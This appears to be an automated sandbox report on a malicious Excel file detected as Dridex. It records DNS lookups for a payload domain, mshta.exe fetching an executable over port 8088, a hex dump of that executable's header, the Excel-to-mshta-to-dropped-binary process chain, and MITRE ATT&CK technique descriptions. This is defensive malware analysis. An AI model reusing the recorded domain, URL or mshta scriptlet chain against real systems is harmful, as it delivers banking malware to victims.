Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 14, 2021 20:00:06.259974957 CEST	192.168.2.22	8.8.8.8	0x70c0	Standard query (0)	onlinefastsolutions.com	A (IP address)	IN (0x0001)
Jul 14, 2021 20:00:06.303292990 CEST	192.168.2.22	8.8.8.8	0x3714	Standard query (0)	onlinefastsolutions.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jul 14, 2021 20:00:06.286272049 CEST	8.8.8.8	192.168.2.22	0x70c0	No error (0)	onlinefastsolutions.com	208.83.69.35	A (IP address)	IN (0x0001)
Jul 14, 2021 20:00:06.286272049 CEST	8.8.8.8	192.168.2.22	0x70c0	No error (0)	onlinefastsolutions.com	128.199.243.169	A (IP address)	IN (0x0001)
Jul 14, 2021 20:00:06.286272049 CEST	8.8.8.8	192.168.2.22	0x70c0	No error (0)	onlinefastsolutions.com	163.172.213.69	A (IP address)	IN (0x0001)
Jul 14, 2021 20:00:06.286272049 CEST	8.8.8.8	192.168.2.22	0x70c0	No error (0)	onlinefastsolutions.com	185.21.216.153	A (IP address)	IN (0x0001)
Jul 14, 2021 20:00:06.327779055 CEST	8.8.8.8	192.168.2.22	0x3714	No error (0)	onlinefastsolutions.com	185.21.216.153	A (IP address)	IN (0x0001)
Jul 14, 2021 20:00:06.327779055 CEST	8.8.8.8	192.168.2.22	0x3714	No error (0)	onlinefastsolutions.com	163.172.213.69	A (IP address)	IN (0x0001)
Jul 14, 2021 20:00:06.327779055 CEST	8.8.8.8	192.168.2.22	0x3714	No error (0)	onlinefastsolutions.com	128.199.243.169	A (IP address)	IN (0x0001)
Jul 14, 2021 20:00:06.327779055 CEST	8.8.8.8	192.168.2.22	0x3714	No error (0)	onlinefastsolutions.com	208.83.69.35	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

onlinefastsolutions.com:8088

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	208.83.69.35	8088	C:\Windows\System32\mshta.exe

Timestamp	kBytes transferred	Direction	Data
Jul 14, 2021 20:00:06.454802990 CEST	0	OUT	GET /tpls/file3.bin HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-us User-Agent: qWK3FM3 Host: onlinefastsolutions.com:8088
Jul 14, 2021 20:00:06.811981916 CEST	2	IN	HTTP/1.1 200 OK Server: nginx/1.15.12 Date: Wed, 14 Jul 2021 18:00:06 GMT Content-Type: application/octet-stream Content-Length: 167936 Connection: keep-alive Last-Modified: Wed, 14 Jul 2021 13:48:51 GMT ETag: "60eeeb43-29000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ff 81 78 c1 bb e0 16 92 bb e0 16 92 bb e0 16 92 bb e0 17 92 89 e0 16 92 b2 98 85 92 98 e0 16 92 bb e0 16 92 ba e0 16 92 b6 b2 ca 92 ba e0 16 92 b6 b2 cd 92 ba e0 16 92 b6 b2 c8 92 ba e0 16 92 52 69 63 68 bb e0 16 92 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c4 0c f0 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 40 01 00 00 50 01 00 00 00 00 00 f0 3e 01 00 00 10 00 00 00 50 01 00 00 00 00 10 00 10 00 00 00 10 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 02 00 00 10 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 52 01 00 5d 00 00 00 ec 52 01 00 68 01 00 00 00 80 02 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 01 00 00 00 10 51 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 01 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f7 38 01 00 00 10 00 00 00 40 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 0c 00 00 00 50 01 00 00 10 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 19 01 00 00 60 01 00 00 10 01 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ad 04 00 00 00 80 02 00 00 10 00 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 20 01 00 00 00 90 02 00 00 10 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$xRichPEL`@P>P@R]Rh Q8P.text8@ `.rdataPP@@.dataX``@.rsrcp@@.reloc @B

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2820 Parent PID: 584

General

Start time:	19:59:44
Start date:	14/07/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f460000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: mshta.exe PID: 2104 Parent PID: 2820

General

Start time:	19:59:47
Start date:	14/07/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta 'C:\ProgramData\qRangeAutoFormatLocalFormat3.sct'
Imagebase:	0x13f060000
File size:	13824 bytes
MD5 hash:	95828D670CFD3B16EE188168E083C3C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: qDialogMainChartType.exe PID: 3028 Parent PID: 2104

General

Start time:	19:59:49
Start date:	14/07/2021
Path:	C:\ProgramData\qDialogMainChartType.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\qDialogMainChartType.exe
Imagebase:	0x10000000
File size:	167936 bytes
MD5 hash:	EA91555829C1DFDFD47709496461C5D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 30%, ReversingLabs
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 4TWEQh2HJb

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "4TWEQh2HJb.xls"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General

VBA Code Keywords

VBA Code

VBA File Name: ThisWorkbook.cls, Stream Size: 2109

General

VBA Code Keywords

VBA Code